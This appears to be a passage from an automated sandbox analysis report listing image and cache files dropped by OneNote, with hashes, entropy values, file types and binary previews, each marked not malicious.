                                                                                                                                                                                                              SHA-512:FA47D4337F2A350D9216D18453E0BFCD91D2A0BF86ED02C9A13E20411A55ECEFE0C5D6C851A969F206C39595A4D79454C44F220FB7B41E335E712F52E0216C12
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.g7......g7p.T....z@.3E..g7p.T....z@.3E..g7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................. ......h;S.!....N...^................8.Y..=M.....OQe........f........................................I.qk..B.....LZ................ ......h;S.!............ ......h;S.!..........g7......g7......g7..........................................g7j.....g7T.]...g7......g7..B...g7H.....g7..B...g7..>.).g7..J...................;........4...4...4.."...............g7..g7..g7..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........g7......g7....#.g7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12654
                                                                                                                                                                                                              Entropy (8bit):7.745439197485533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                                                                                              MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                                                                                              SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                                                                                              SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                                                                                              SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.37618007109245
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YsU61mZYitEpYXNKT9hnIRAdsrtFrjYFAJO:YsU61mhKpYX49hnIRAdotFrjYFKO
                                                                                                                                                                                                              MD5:5FF4ECDB6DA85BD2AF444B0F1D7C9AA7
                                                                                                                                                                                                              SHA1:FFD097AD59BBFD374B2CE0489791E821398198D3
                                                                                                                                                                                                              SHA-256:347159D52D6A2CD0B935C8BE3D8E783992554B6171F4F1DF0F6AF3A3682E79B4
                                                                                                                                                                                                              SHA-512:F256EE7A8CB1DF2F3B588C0BD600668623EFC13BC3C0B268702C3CCD1AFDDEFD02FA0C68736CC54AA79E839B41AF62172C08E25D8945D0D9DCC26E1C9FE9A5E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.xo......xo..^...b.C...xo..^...b.C...xo..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............IM..l.:.?....R....N...^.................sb..M.].............f........................................I.qk..B.....LZ..............IM..l.:.?....R..........IM..l.:.?....R..........xo......xo......xo..........................................xoj.....xoT.]...xo......xo..B...xoH.....xo..B...xo..>.).xo..J...................;........4...4...4.."...............xo..xo..xo..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........xo......xo....#.xo............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2695
                                                                                                                                                                                                              Entropy (8bit):7.434963358385164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                                                                                              MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                                                                                              SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                                                                                              SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                                                                                              SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.364790780850042
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7inbsReAKgBtWgqgE/E7saXEg29h28clrdhSrD5gatXgw9XLt:7inbslK+0gjE/GsaXEg29h28YRAVgaZ
                                                                                                                                                                                                              MD5:E87723CEF5F2A229FB9527391693E815
                                                                                                                                                                                                              SHA1:21CBD1FEE204D566B48C8D4A814FCE5CFF71124D
                                                                                                                                                                                                              SHA-256:E188C7089CE3F9A5DCE4E6F75A5C2BA4B1B1399C0F85D8EAEBB501E9DD5ECA12
                                                                                                                                                                                                              SHA-512:BC440F1C30467843EB0F32904E45F03CC777D03BF62E998ECF1E09D8474D1C79155B4255FBD5F3E45A364A4D6AD70C744494C862BB70449E9B9EC6CF88EE1D26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZuM......uM...W.....h...=uM...W.....h...=uM...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............lA.?.=...tZ.]....N...^...............D.5....F.......m........f........................................I.qk..B.....LZ..............lA.?.=...tZ.]..........lA.?.=...tZ.].........uM......uM......uM..........................................uM.j....uM.T.]..uM......uM..B..uM.H....uM...B..uM...>.)uM...J...................;........4...4...4.."..............uM..uM..uM...z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........uM......uM.....#uM.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11040
                                                                                                                                                                                                              Entropy (8bit):7.929583162638891
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                                                                                              MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                                                                                              SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                                                                                              SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                                                                                              SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.4570426157069045
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:u7sPY4SUxb4AgCrWEP3FlXC3j987SidkRLwJ4g4qUbW49jzZx4v4g4cg494:KsPY4SUp4AgCf/7XCz9ESidkRLwJ4g4l
                                                                                                                                                                                                              MD5:FB4C81A4108441985866AF91C08486C9
                                                                                                                                                                                                              SHA1:10028D31ADBFD3C414097CB9C6898AE544608275
                                                                                                                                                                                                              SHA-256:67845C116109E6FA06F854C4A22D9B8BEFF23A75608A4EF2D510F5284F7ECF75
                                                                                                                                                                                                              SHA-512:EB8CAC132408B96A59C4063D25479651AE4E3648D986BEB338A26C0F15E93A5C2A2057F01A0E94DF36EA25BABF5902E5258B91BDEEB6D3104FF195A5FCF41544
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZz.......z..C..5...+T7f'.z..C..5...+T7f'.z....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............o.j....4...Je......N...^................."MG.\I.D..............Z................................... ....I.qk..B.....LZ............o.j....4...Je..........o.j....4...Je...........z.......z.......z...........................................z..j....z..T%c..z.......z....G..z....H..z....>..z.......z.. .3...................;........4...4...4.."..............z...z...z....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........z.......z......#z..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2268
                                                                                                                                                                                                              Entropy (8bit):7.384274251000273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                                                                                              MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                                                                                              SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                                                                                              SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                                                                                              SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):784
                                                                                                                                                                                                              Entropy (8bit):6.962539208465222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                                                                                              MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                                                                                              SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                                                                                              SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                                                                                              SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):2.7226669246302655
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:iSNsrQGaH1UVlBbkFbdL4QltUEwwrYjcXgjc9PmLINhrdQVr1xtX2VRV55:5sr5G1ULVkBxFlWEHXXv90I3RQ5TWN
                                                                                                                                                                                                              MD5:5F3CDB78EA865673FAB4D8CC0A0E44C9
                                                                                                                                                                                                              SHA1:890B7A5E51C8630C6BAE32CC1D6D54991C50F945
                                                                                                                                                                                                              SHA-256:F00EBC7D1F7BB5B092398D3D567C3E490D0300762759062A91E5B2147C5BB4B3
                                                                                                                                                                                                              SHA-512:80239F7FE4D77E583D559BE67CD56B64003387F8F6599090C658C54BCD1DE80C645BC32F3577414FDD457E470F54E5F157D0C3836B5B46B9B4EE2551A12CCB5B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZM U.....M UE....4......M UE....4......M U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............B..h.i.&=..n......N...^................M.=.G.O.......d............................................^....I.qk..B.....LZ.............B..h.i.&=..n...........B..h.i.&=..n...........M U.....M U.....M U.........................................M Uj....M UT.l..M U.....M U..Q..M U..Q..M U..>..M U.....M U .3...................;........4...4...4.."..............M U.M U.M U..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........M U.....M U....#M U............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3009
                                                                                                                                                                                                              Entropy (8bit):7.493528353751471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                                                                                                                              MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                                                                                                                              SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                                                                                                                              SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                                                                                                                              SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2266
                                                                                                                                                                                                              Entropy (8bit):5.563021222358941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                                                                                                                              MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                                                                                                                              SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                                                                                                                              SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                                                                                                                              SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.338845005632309
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuX5cs5iSm+zqum2Z8t4PxEgJXgoGt9+NoZrdQqriBfG2BXNFv+JVZxH541:YNsyh2Z8mZEwXgxt9+NgRQyQG2K4
                                                                                                                                                                                                              MD5:92787237561D5A4C9121AF982EEFB241
                                                                                                                                                                                                              SHA1:F2E990CC8428D7096E42F5EA44C24C9E408187F6
                                                                                                                                                                                                              SHA-256:BE9CC23A1B178CE3F0E21B7A341D8E44852B552B6BD029241CDAC4E0D502059D
                                                                                                                                                                                                              SHA-512:2251F37B90A20B99759E0934C664029BE48F0929848D7F452D4CFCA03214DD04263AEA23EFEFF8DEFDE808206D11C2318CFD07C1607B673FE280F99E28B6AF65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ............$..#s....%.....$..#s....%......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L...U..a.L."A.....N...^...............|.....dB.U.S............f........................................I.qk..B.....LZ..............L...U..a.L."A...........L...U..a.L."A.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):99293
                                                                                                                                                                                                              Entropy (8bit):7.9690121496708555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                                                                                                                              MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                                                                                                                              SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                                                                                                                              SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                                                                                                                              SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.335660083087687
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuWsFwUQeXLJCtZvadtEVpyCLXTparL9OW0ofBrdQqrId9nBX/xV/eB19ZPoR:YxsdLJC7CbEPFXQP9OB6BRQyILnX
                                                                                                                                                                                                              MD5:3EE81C928965FC15E73C9C1FA485D40A
                                                                                                                                                                                                              SHA1:66090ADB061092DE5719EBB69AB168ADA2B153CD
                                                                                                                                                                                                              SHA-256:6CF2C74F189B2FAB271329879DACD922F8E03B5287C9D2ED3FA9F913298F46B8
                                                                                                                                                                                                              SHA-512:A330927AF510A026677EA90D0AB63AD8B6A9EC186A7462DA3CA06E98CFCBF6FC66A0FE7947BA2E2E22DCCB92B1FD241F3A45FBE152A2BA45F45C96D3E695982C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZL.......L....C.:..H.N..L....C.:..H.N..L....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............=..v_.......g......N...^.................8.$6.B..a...L.........f........................................I.qk..B.....LZ.............=..v_.......g...........=..v_.......g...........L.......L.......L...........................................L..j....L..T.]..L.......L....B..L..H....L....B..L....>.)L....J...................;........4...4...4.."..............L...L...L....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........L.......L......#L..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2898
                                                                                                                                                                                                              Entropy (8bit):7.551512280854713
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                                                                                              MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                                                                                              SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                                                                                              SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                                                                                              SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                                                                                              Malicious:false
